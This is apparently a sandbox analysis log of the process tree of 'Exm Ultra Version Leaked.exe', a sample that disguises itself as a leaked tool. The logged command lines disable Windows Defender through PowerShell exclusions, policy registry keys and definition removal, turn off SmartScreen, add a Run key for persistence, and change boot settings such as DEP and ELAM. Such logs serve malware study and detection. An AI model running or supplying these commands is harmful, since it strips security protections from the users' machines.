C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3168
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5432 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:1096
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4884 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:81⤵PID:1040
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\EXM_Leaked.rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"2⤵
- Executes dropped EXE
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"4⤵PID:868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5424
-
-
-
      PID 1304 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        PID 5124 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      PID 4308 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        PID 5208 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      PID 3984 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "start bound.exe"
        PID 5140 | C:\Users\Admin\AppData\Local\Temp\bound.exe | bound.exe
          - Executes dropped EXE
          - Adds Run key to start application
          PID 5216 | C:\Windows\SYSTEM32\cmd.exe | cmd /c "Fn Opti.bat"
            PID 6060 | C:\Windows\system32\timeout.exe | timeout /t 2
              - Delays execution with timeout.exe
            PID 6104 | C:\Windows\system32\timeout.exe | timeout /t 2
              - Delays execution with timeout.exe
            PID 4252 | C:\Windows\system32\fsutil.exe | fsutil behavior query memoryusage
            PID 3984 | C:\Windows\system32\fsutil.exe | fsutil behavior set memoryusage 2
            PID 3796 | C:\Windows\system32\bcdedit.exe | bcdedit /set increaseuserva 8000
              - Modifies boot configuration data using bcdedit
            PID 5376 | C:\Windows\system32\ipconfig.exe | ipconfig /release
              - Gathers network information
            PID 5404 | C:\Windows\system32\ipconfig.exe | ipconfig /renew
              - Gathers network information
            PID 5492 | C:\Windows\system32\ipconfig.exe | ipconfig /flushdns
              - Gathers network information
            PID 5524 | C:\Windows\system32\netsh.exe | netsh winsock reset
            PID 5480 | C:\Windows\system32\netsh.exe | netsh int tcp set global chimney=enabled
            PID 5628 | C:\Windows\system32\netsh.exe | netsh int tcp set global autotuninglevel=normal
            PID 3168 | C:\Windows\system32\netsh.exe | netsh int tcp set supplemental
            PID 332 | C:\Windows\system32\netsh.exe | netsh int tcp set global dca=enabled
            PID 5736 | C:\Windows\system32\netsh.exe | netsh int tcp set global netdma=enabled
            PID 5784 | C:\Windows\system32\netsh.exe | netsh int tcp set global congestionprovider=ctcp
            PID 3880 | C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="StopThrottling" dir=in
              - Modifies Windows Firewall
            PID 5352 | C:\Windows\system32\bcdedit.exe | bcdedit /set allowedinmemorysettings 0
              - Modifies boot configuration data using bcdedit
            PID 5284 | C:\Windows\system32\bcdedit.exe | bcdedit /deletevalue useplatformclock
              - Modifies boot configuration data using bcdedit
            PID 5364 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick Yes
              - Modifies boot configuration data using bcdedit
            PID 5700 | C:\Windows\system32\bcdedit.exe | bcdedit /set tscsyncpolicy Enhanced
              - Modifies boot configuration data using bcdedit
            PID 2160 | C:\Windows\system32\bcdedit.exe | bcdedit /set debug No
              - Modifies boot configuration data using bcdedit
            PID 5160 | C:\Windows\system32\bcdedit.exe | bcdedit /set isolatedcontext No
              - Modifies boot configuration data using bcdedit
            PID 4048 | C:\Windows\system32\bcdedit.exe | bcdedit /set pae ForceEnable
              - Modifies boot configuration data using bcdedit
            PID 5132 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootmenupolicy Legacy
              - Modifies boot configuration data using bcdedit
            PID 5208 | C:\Windows\system32\bcdedit.exe | bcdedit /set usefirmwarepcisettings No
              - Modifies boot configuration data using bcdedit
            PID 3000 | C:\Windows\system32\bcdedit.exe | bcdedit /set sos Yes
              - Modifies boot configuration data using bcdedit
            PID 4732 | C:\Windows\system32\bcdedit.exe | bcdedit /set disabledynamictick Yes
              - Modifies boot configuration data using bcdedit
            PID 3536 | C:\Windows\system32\bcdedit.exe | bcdedit /set disableelamdrivers Yes
              - Modifies boot configuration data using bcdedit
            PID 4604 | C:\Windows\system32\bcdedit.exe | bcdedit /set quietboot Yes
              - Modifies boot configuration data using bcdedit
            PID 4260 | C:\Windows\system32\bcdedit.exe | bcdedit /set x2apicpolicy Enable
              - Modifies boot configuration data using bcdedit
            PID 5824 | C:\Windows\system32\bcdedit.exe | bcdedit /set vsmlaunchtype Off
              - Modifies boot configuration data using bcdedit
            PID 5268 | C:\Windows\system32\bcdedit.exe | bcdedit /set usephysicaldestination No
              - Modifies boot configuration data using bcdedit
            PID 5204 | C:\Windows\system32\bcdedit.exe | bcdedit /set ems No
              - Modifies boot configuration data using bcdedit
            PID 2812 | C:\Windows\system32\bcdedit.exe | bcdedit /set firstmegabytepolicy UseAll
              - Modifies boot configuration data using bcdedit
            PID 4800 | C:\Windows\system32\bcdedit.exe | bcdedit /set configaccesspolicy Default
              - Modifies boot configuration data using bcdedit
            PID 4760 | C:\Windows\system32\bcdedit.exe | bcdedit /set linearaddress57 optin
              - Modifies boot configuration data using bcdedit
            PID 2600 | C:\Windows\system32\bcdedit.exe | bcdedit /set noumex Yes
              - Modifies boot configuration data using bcdedit
            PID 2244 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootems No
              - Modifies boot configuration data using bcdedit
            PID 5828 | C:\Windows\system32\bcdedit.exe | bcdedit /set graphicsmodedisabled No
              - Modifies boot configuration data using bcdedit
            PID 5888 | C:\Windows\system32\bcdedit.exe | bcdedit /set extendedinput Yes
              - Modifies boot configuration data using bcdedit
            PID 5708 | C:\Windows\system32\bcdedit.exe | bcdedit /set highestmode Yes
              - Modifies boot configuration data using bcdedit
            PID 5908 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcefipscrypto No
              - Modifies boot configuration data using bcdedit
            PID 5948 | C:\Windows\system32\bcdedit.exe | bcdedit /set perfmem 0
              - Modifies boot configuration data using bcdedit
            PID 5936 | C:\Windows\system32\bcdedit.exe | bcdedit /set configflags 0
              - Modifies boot configuration data using bcdedit
            PID 5996 | C:\Windows\system32\bcdedit.exe | bcdedit /set uselegacyapicmode No
              - Modifies boot configuration data using bcdedit
            PID 5912 | C:\Windows\system32\bcdedit.exe | bcdedit /set onecpu No
              - Modifies boot configuration data using bcdedit
            PID 5968 | C:\Windows\system32\bcdedit.exe | bcdedit /set halbreakpoint No
              - Modifies boot configuration data using bcdedit
            PID 5976 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcelegacyplatform No
              - Modifies boot configuration data using bcdedit
            PID 6012 | C:\Windows\system32\bcdedit.exe | bcdedit /set allowedinmemorysettings 0
              - Modifies boot configuration data using bcdedit
            PID 6040 | C:\Windows\system32\bcdedit.exe | bcdedit /deletevalue useplatformclock
              - Modifies boot configuration data using bcdedit
            PID 1948 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick Yes
              - Modifies boot configuration data using bcdedit
            PID 4748 | C:\Windows\system32\bcdedit.exe | bcdedit /set tscsyncpolicy Enhanced
              - Modifies boot configuration data using bcdedit
            PID 5812 | C:\Windows\system32\bcdedit.exe | bcdedit /set debug No
              - Modifies boot configuration data using bcdedit
            PID 6068 | C:\Windows\system32\bcdedit.exe | bcdedit /set isolatedcontext No
              - Modifies boot configuration data using bcdedit
            PID 4560 | C:\Windows\system32\bcdedit.exe | bcdedit /set pae ForceEnable
              - Modifies boot configuration data using bcdedit
            PID 3280 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootmenupolicy Legacy
              - Modifies boot configuration data using bcdedit
            PID 6092 | C:\Windows\system32\bcdedit.exe | bcdedit /set usefirmwarepcisettings No
              - Modifies boot configuration data using bcdedit
            PID 3192 | C:\Windows\system32\bcdedit.exe | bcdedit /set sos Yes
              - Modifies boot configuration data using bcdedit
            PID 3788 | C:\Windows\system32\bcdedit.exe | bcdedit /set disabledynamictick Yes
              - Modifies boot configuration data using bcdedit
            PID 4828 | C:\Windows\system32\bcdedit.exe | bcdedit /set disableelamdrivers Yes
              - Modifies boot configuration data using bcdedit
            PID 1188 | C:\Windows\system32\bcdedit.exe | bcdedit /set quietboot Yes
              - Modifies boot configuration data using bcdedit
            PID 456 | C:\Windows\system32\bcdedit.exe | bcdedit /set x2apicpolicy Enable
              - Modifies boot configuration data using bcdedit
            PID 1604 | C:\Windows\system32\bcdedit.exe | bcdedit /set vsmlaunchtype Off
              - Modifies boot configuration data using bcdedit
            PID 6116 | C:\Windows\system32\bcdedit.exe | bcdedit /set usephysicaldestination No
              - Modifies boot configuration data using bcdedit
            PID 3700 | C:\Windows\system32\bcdedit.exe | bcdedit /set ems No
              - Modifies boot configuration data using bcdedit
            PID 1104 | C:\Windows\system32\bcdedit.exe | bcdedit /set firstmegabytepolicy UseAll
              - Modifies boot configuration data using bcdedit
            PID 3732 | C:\Windows\system32\bcdedit.exe | bcdedit /set configaccesspolicy Default
              - Modifies boot configuration data using bcdedit
            PID 6124 | C:\Windows\system32\bcdedit.exe | bcdedit /set linearaddress57 optin
              - Modifies boot configuration data using bcdedit
            PID 5136 | C:\Windows\system32\bcdedit.exe | bcdedit /set noumex Yes
              - Modifies boot configuration data using bcdedit
            PID 5172 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootems No
              - Modifies boot configuration data using bcdedit
            PID 4416 | C:\Windows\system32\bcdedit.exe | bcdedit /set graphicsmodedisabled No
              - Modifies boot configuration data using bcdedit
            PID 2460 | C:\Windows\system32\bcdedit.exe | bcdedit /set extendedinput Yes
              - Modifies boot configuration data using bcdedit
            PID 5292 | C:\Windows\system32\bcdedit.exe | bcdedit /set highestmode Yes
              - Modifies boot configuration data using bcdedit
            PID 1240 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcefipscrypto No
              - Modifies boot configuration data using bcdedit
            PID 2428 | C:\Windows\system32\bcdedit.exe | bcdedit /set perfmem 0
              - Modifies boot configuration data using bcdedit
            PID 5408 | C:\Windows\system32\bcdedit.exe | bcdedit /set configflags 0
              - Modifies boot configuration data using bcdedit
            PID 3260 | C:\Windows\system32\bcdedit.exe | bcdedit /set uselegacyapicmode No
              - Modifies boot configuration data using bcdedit
            PID 1760 | C:\Windows\system32\bcdedit.exe | bcdedit /set onecpu No
              - Modifies boot configuration data using bcdedit
            PID 5396 | C:\Windows\system32\bcdedit.exe | bcdedit /set halbreakpoint No
              - Modifies boot configuration data using bcdedit
            PID 5412 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcelegacyplatform No
            PID 5532 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformclock no
            PID 984 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick yes
            PID 5564 | C:\Windows\system32\bcdedit.exe | bcdedit /set disabledynamictick yes
            PID 5516 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick Yes
            PID 5500 | C:\Windows\system32\bcdedit.exe | bcdedit /set tscsyncpolicy Enhanced
            PID 3928 | C:\Windows\system32\bcdedit.exe | bcdedit /set disableelamdrivers Yes
            PID 1548 | C:\Windows\system32\bcdedit.exe | bcdedit /set vsmlaunchtype Off
            PID 4860 | C:\Windows\system32\bcdedit.exe | bcdedit /set firstmegabytepolicy UseAll
            PID 4968 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcefipscrypto No
            PID 752 | C:\Windows\system32\bcdedit.exe | bcdedit /set perfmem 0
            PID 5436 | C:\Windows\system32\bcdedit.exe | bcdedit /set configflags 0
            PID 5660 | C:\Windows\system32\bcdedit.exe | bcdedit /set tscsyncpolicy Enhanced
            PID 5568 | C:\Windows\system32\bcdedit.exe | bcdedit /set disabledynamictick yes
            PID 3484 | C:\Windows\system32\bcdedit.exe | bcdedit /set nx AlwaysOff
            PID 1668 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick yes
            PID 4624 | C:\Windows\system32\bcdedit.exe | bcdedit /set vsmlaunchtype Off
            PID 2476 | C:\Windows\system32\bcdedit.exe | bcdedit /set forcefipscrypto No
            PID 3492 | C:\Windows\system32\bcdedit.exe | bcdedit /timeout 2
            PID 3168 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformclock no
            PID 5740 | C:\Windows\system32\bcdedit.exe | bcdedit /set disabledynamictick yes
            PID 3592 | C:\Windows\system32\bcdedit.exe | bcdedit /set useplatformtick yes
            PID 5676 | C:\Windows\system32\bcdedit.exe | bcdedit /set nx optout
            PID 5736 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootux disabled
            PID 5760 | C:\Windows\system32\bcdedit.exe | bcdedit /set bootmenupolicy standard
            PID 3392 | C:\Windows\system32\bcdedit.exe | bcdedit /set hypervisorlaunchtype off
            PID 5308 | C:\Windows\system32\bcdedit.exe | bcdedit /set tpmbootentropy ForceDisable
            PID 1736 | C:\Windows\system32\bcdedit.exe | bcdedit /set quietboot yes
            PID 3880 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f
            PID 4140 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f
            PID 5788 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
            PID 5080 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f
            PID 3804 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f
            PID 5128 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f
            PID 5392 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f
            PID 5648 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
            PID 5696 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f
              - Modifies visibility of file extensions in Explorer
            PID 5544 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f
            PID 2028 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f
            PID 5724 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f
            PID 5640 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f
            PID 5424 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f
            PID 5288 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f
            PID 5512 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f
            PID 2124 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f
            PID 4872 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f
            PID 868 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
            PID 5244 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
            PID 4348 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f
            PID 880 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f
            PID 840 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f
            PID 4308 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f
            PID 224 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f
            PID 1304 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
            PID 4556 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
            PID 3536 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
            PID 4604 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
            PID 4260 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
            PID 5824 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
            PID 5268 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
            PID 5204 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f
            PID 2812 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f
            PID 4800 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f
            PID 408 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f
            PID 3144 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
            PID 5840 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
            PID 5856 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
            PID 5904 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
            PID 5960 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
            PID 5944 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f
            PID 5972 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f
            PID 5980 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f
            PID 5952 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
            PID 5992 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
            PID 5920 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
            PID 6004 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f
            PID 6000 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
            PID 6056 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
            PID 5472 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f
            PID 4748 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
            PID 5812 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
            PID 6068 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
            PID 4560 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
            PID 3280 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
            PID 6092 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
            PID 3192 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
            PID 3788 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
            PID 4828 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
            PID 1188 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
            PID 456 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
              - Modifies security service
            PID 6108 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
              - Modifies security service
            PID 2280 | C:\Windows\system32\reg.exe | Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
            PID 5420 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
            PID 5168 | C:\Windows\system32\sc.exe | sc stop dmwappushservice
              - Launches sc.exe
            PID 5136 | C:\Windows\system32\net.exe | net stop dmwappushservice
              PID 5172 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop dmwappushservice
            PID 5380 | C:\Windows\system32\sc.exe | sc config dmwappushservice start= disabled
              - Launches sc.exe
            PID 2460 | C:\Windows\system32\net.exe | net stop diagnosticshub.standardcollector.service
              PID 5292 | C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop diagnosticshub.standardcollector.service
            PID 1240 | C:\Windows\system32\sc.exe | sc config diagnosticshub.standardcollector.service start= disabled
              - Launches sc.exe
            PID 1360 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
            PID 5368 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f
            PID 2796 | C:\Windows\system32\reg.exe | Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f
